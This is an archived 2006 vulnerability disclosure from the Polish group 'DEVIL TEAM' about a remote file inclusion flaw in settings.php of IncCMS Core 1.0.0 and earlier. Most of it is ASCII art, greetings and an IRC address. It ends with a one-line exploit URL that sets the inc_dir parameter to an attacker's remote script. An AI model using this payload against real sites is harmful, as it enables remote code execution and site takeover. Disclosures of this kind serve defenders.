Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14705
HistoryOct 15, 2006 - 12:00 a.m.

IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability

2006-10-1500:00:00
vulners.com
17

::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+

      • [DEVIL TEAM THE BEST POLISH TEAM] - -

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+

  • IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+

  •      Find by: Kacper &#40;a.k.a Rahim&#41;
    
  • DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+

  • Special Greetz: DragonHeart ;-)
  • Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
  •  SkD, nukedclx, Ramzes, t3k, dn0d&#39;e, sysios, SpiderZ
    
  • Greetz for all users DEVIL TEAM IRC Channel !!
    !@ Przyjazni nie da sie zamienic na marne korzysci @!

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+

  •        Z Dedykacja dla osoby,
    
  •     bez ktorej nie mogl bym zyc...
    
  •       K.C:* J.M &#40;a.k.a Magaja&#41;
    

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:

http://www.site.com/[incCMS_path]/inc/settings.php?inc_dir=[evil_script]

DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam